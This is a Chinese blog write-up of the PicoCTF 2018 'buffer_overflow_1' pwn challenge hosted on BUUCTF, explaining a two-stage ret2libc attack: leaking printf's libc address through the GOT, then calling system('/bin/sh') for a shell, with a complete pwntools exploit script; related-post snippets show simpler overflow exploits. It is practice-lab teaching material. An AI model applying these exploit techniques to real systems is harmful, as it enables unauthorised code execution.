BUUCTF:PicoCTF_2018_buffer_overflow_1

最新推荐文章于 2023-05-13 10:55:43 发布
最新推荐文章于 2023-05-13 10:55:43 发布
阅读量1.3k 收藏
点赞数 2
分类专栏: buuctf刷题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51055545/article/details/122329005
版权

缓冲区溢出 libc地址泄露 system函数 shell pwnable
关键词由CSDN通过智能技术生成

我看网络上大多数都是直接溢出到win()函数,这篇我就提供给刚入门的pwner另外一种思路

先放进虚拟机中检查:

任何保护机制都没开,放到32位IDA中:

主函数很简单,进入vuln()函数看一下:

很明显有溢出,进入栈中看偏移:

 这里偏移为0x28,我们思路是第一次溢出,去泄露libc地址,再次进行溢出get shell。

第一次溢出:

io.recvuntil(':')
payload = 'A'*0X28
payload += p32(0)
payload += p32(printf)
payload += p32(main)
payload += p32(elf.got['printf'])

io.sendline(payload)
io.recvuntil('0x8048420\n')

leak = u32(io.recv(4))
libc_base = leak - libc.sym['printf']
system = libc_base + libc.sym['system']
binsh = libc_base + libc.search('/bin/sh\x00').next()

success(hex(leak))
success(hex(libc_base))
success(hex(system))
success(hex(binsh))

第二次进行溢出:

io.recvuntil(':')
payload = 'A'*0x28
payload += p32(0)
payload += p32(system)
payload += p32(0)
payload += p32(binsh)

io.sendline(payload)

完整exp:

from pwn import *
elf = ELF('./PicoCTF_2018_buffer_overflow_1')
io = remote('node4.buuoj.cn',27620)
libc = ELF('./libc-2.27.so')
context(log_level='debug')

main = 0x804865D
printf = 0x8048420

io.recvuntil(':')

payload = 'A'*0X28
payload += p32(0)
payload += p32(printf)
payload += p32(main)
payload += p32(elf.got['printf'])

io.sendline(payload)
io.recvuntil('0x8048420\n')

leak = u32(io.recv(4))
success(hex(leak))

libc_base = leak - libc.sym['printf']
system = libc_base + libc.sym['system']
binsh = libc_base + libc.search('/bin/sh\x00').next()

success(hex(libc_base))
success(hex(system))
success(hex(binsh))

io.recvuntil(':')
payload = 'A'*0x28
payload += p32(0)
payload += p32(system)
payload += p32(0)
payload += p32(binsh)

io.sendline(payload)

io.interactive()

 喜提flag!

Leee333
关注
专栏目录
C++11多线程 内存序(std::memory_order_relaxed)
qls315的博客
08-26 1万+
1
MySQL优化:innodb_buffer_pool_instances与innodb_buffer_pool_size参数分析
SunZLong的博客
01-10 1万+
首先了解三个参数三个参数: innodb_buffer_pool_size(缓冲池大小) innodb_buffer_pool_chunk_size(定义InnoDB缓冲池大小调整操作的块大小) innodb_buffer_pool_instances(InnoDB缓冲池划分为的区域数) 关于两个参数的关系,在MySQL8.0的官方文档中: Buffer pool size must ...
PicoCTF_2018_buffer_overflow_1
m0sway的博客
11-28 435
PicoCTF_2018_buffer_overflow_1 使用checksec查看: 保护机制全关,看起来没啥难度。 扔进IDA中查看: 主函数中给出了漏洞函数,跟进查看: gets()函数,栈溢出,s距离ebp0x28 查看下这题的字符串可以发现函数win(): 能够直接获取到flag,直接秒了这题。 exp: from pwn import * #start # r = process("../buu/PicoCTF_2018_buffer_overflow_1") r = remote
[BUUCTF-pwn]——picoctf_2018_buffer overflow 1
Y_peak的博客
03-16 331
[BUUCTF-pwn]——picoctf_2018_buffer overflow 1 简单的栈溢出, 返回地址,设置为win就好 exploit from pwn import * p = remote("node3.buuoj.cn",25059) payload = 'a' * (0x28 + 4) + p32(0x080485CB) p.sendline(payload) p.interactive()
picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap
、moddemod
07-19 336
picoctf_2018_buffer overflow_1 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_1' # p = process(proc_name) p = remote('node3.buuoj.cn', 28190) e
picoctf_2018_buffer overflow 1
个人笔记
04-26 100
【代码】picoctf_2018_buffer overflow 1。
上传文件failed to load resource net::ERR_CONNECTION_RESET
热门推荐
shizhihua11的博客
01-10 2万+
1.问题描述 1.1报错 项目在上传文件时,后端请求没有返回结果,但是在谷歌浏览器控制台会报错net::ERR_CONNECTION_RESET 在火狐浏览器测试,控制台并不会报错 本地调试上传,报错文件/node_modules/rc-upload/es/request.js:90 rc-upload ant design pro上传组件upload 所使用”rc-upload”组件...
Tensorflow:terminate called after throwing an instance of 'std::bad_alloc' what(): std::bad_alloc
yangyang_liu的博客
04-13 1万+
在tensorflow教程深入mnist这一部分,如果照搬CNN代码,会出现terminate called after throwing an instance of 'std::bad_alloc'   what():  std::bad_alloc  Process finished with exit code 134 (interrupted by signal 6: SIGABRT)这
Chrome 72 73版本 provisional headers are shown及(failed) net:ERR_INVALID_HTTP_RESPONSE问题
GeraldXue的博客
03-20 1万+
Chrome 72 73版本 provisional headers are shown及(failed) net:ERR_INVALID_HTTP_RESPONSE问题 Tag #boa #post #request #response #ajax #provisional headers are shown #net:ERR_INVALID_HTTP_RESPONSE #chrome 问题描述...
[BUUCTF]PWN——picoctf_2018_buffer overflow 1
BangSen1的博客
03-20 297
picoctf_2018_buffer overflow 1 例行检查,32位,没开启保护 运行一下 用IDA打开,检索字符串,看到了flag.txt,跟进找到了调用flag.txt的函数 win_addr=0x80485CB gets函数读入,存在溢出漏洞,覆盖ret为win函数即可 from pwn import* r=remote('node3.buuoj.cn',26185) win_addr=0x80485CB payload='a'*(0x28+4)+p32(win_addr)
picoctf_2018_buffer overflow 0
z1r0的博客
02-14 416
picoctf_2018_buffer overflow 0 查看保护 这里会将flag输入到flag这个全局变量里,还有一个signal信号11。表示对存储的无效访问 这里的话将flag写到stderr中。然后fflush(stdeer)刷新标准错误输出缓冲区,把输出缓冲区里的东西打印到标准输出设备上 ,也就是会打印flag。其实就是当程序造成无效内存访问的时候,就会输出flag。 接着再输入参数,放到vuln函数里 这里有一个栈溢出,因为输入的参数可以无限长,所以在执行栈溢出时,程序会造成无效内
BUUCTF pwn——PicoCTF_2018_buffer_overflow 1
最新发布
CNS-Enterprise BCC-1701-J
05-13 99
BUUCTF 做题练习
PicoCTF_2018_buffer_overflow_2
m0sway的博客
11-29 384
PicoCTF_2018_buffer_overflow_2 使用checksec查看: 开启了栈不可执行,放进IDA中查看,其实和PicoCTF_2018_buffer_overflow_1没啥变化 唯一做了变动的是win()函数: 上一题是直接跳到这个函数就能读取到flag,这题需要给win()函数两个参数a1、a2 a1需要等于0xDEADBEEF a2需要等于0xDEADC0DE 才能读取到flag。 那么直接传参即可,秒了。 exp: from pwn import * #start r
[BUUCTF]PWN——picoctf_2018_buffer overflow 0
mcmuyanga的博客
03-09 450
picoctf_2018_buffer overflow 0 附件 步骤 例行检查,32位程序,开启了nx保护 提示要ssh链接 ssh连上后稍微尝试了一下,好像vuln这个程序能读出flag 32为ida载入测试文件 百度一下signal,得知11是(SIGSEGV),对存储的无效访问的信号。 15行的意思是设置了一个函数sigsegv_handler来处理当程序产生对存储的无效访问。 就是说当程序造成无效内存访问的时候,就会输出flag。 在往下看vuln函数 将src拷贝到dest中,
PicoCTF_2018_buffer_overflow_2详细wp
m0_46204503的博客
11-12 3077
PicoCTF_2018_buffer_overflow_2 知识点 函数调用栈机制(栈溢出) 栈传参 32位程序栈传参,以逆序传入参数,即最后一个参数在最高地址 64位程序前6个参数是寄存器传参,前6个参数分别存在rdi、rsi、rdx、rcx、r8、r9 little trick 如何将一个数转化成底层的二进制的机器码 手算 网上找在线工具,这里不做介绍 在IDA中看汇编代码 因为c代码都可以当做一组汇编指令,比如从上述的0x804861D开始到0x804862D四句汇编指令
[BUUCTF-pwn]——picoctf_2018_buffer overflow 0
Y_peak的博客
04-28 409
[BUUCTF-pwn]——picoctf_2018_buffer overflow 0 好久不写BUU了,手都快生了赶快过来写写。 通过观察源文件发现,首先有put函数不需要去libc中找,同时argv肯定大于1,也就是需要至少两个参数,才可以到else语句,同时vuln函数的参数是第二个参数。 进入vuln函数内部看看,找到strcpy函数这个函数是一个典型的可以用来利用溢出的函数。所以我们可以在这里进行栈溢出,以此调用puts函数打印flag.因为flag在bss段上。 from pwn imp
[BUUCTF-pwn]——picoctf_2018_buffer overflow 2
Y_peak的博客
03-17 428
[BUUCTF-pwn]——picoctf_2018_buffer overflow 2 简单的栈溢出,不过需要将参数自己设置而已 注意负数如何转换为补码, 不知道也可以直接在汇编里面找 from pwn import * p = remote('node3.buuoj.cn',28931) a1 = 0xdeadbeef a2 = 0xdeadc0de payload = 'a' * (0x6c + 4) + p32(0x080485CB) + p32(0)+ p32(a1) + p32(a2) p.re
关于缓冲区溢出(Buffer Overflow)
yiyeqinghuasoon
09-06 638
接触黑客的同志们经常遇到,使用一些扫描工具扫描的时候,会得到一些缓冲区溢出的漏洞,但是怎么利用自己是一团雾水 网上很少有相关的工具,也很少有相关的文章,下面我们就说说这个“窿西”吧 [蛋痛]文章丢失了一次,CSDN需要改进暂存机制 用VB的便宜不太明白“缓冲区”,当然这一点对熟悉API的朋友有一定改善,缓冲区就是一段内存,通俗这么讲吧。 我们给局部变量或者全局变量赋值时,变量的内存大小...
Linux核心数据结构详解:block_dev_struct与buffer_head
本文主要介绍了Linux环境下的两种关键数据结构:block_dev_struct和buffer_head,这些数据结构在系统管理和数据缓存方面起着重要作用。 1. block_dev_struct - **作用**:block_dev_struct是Linux内核中用于管理块...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leee333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值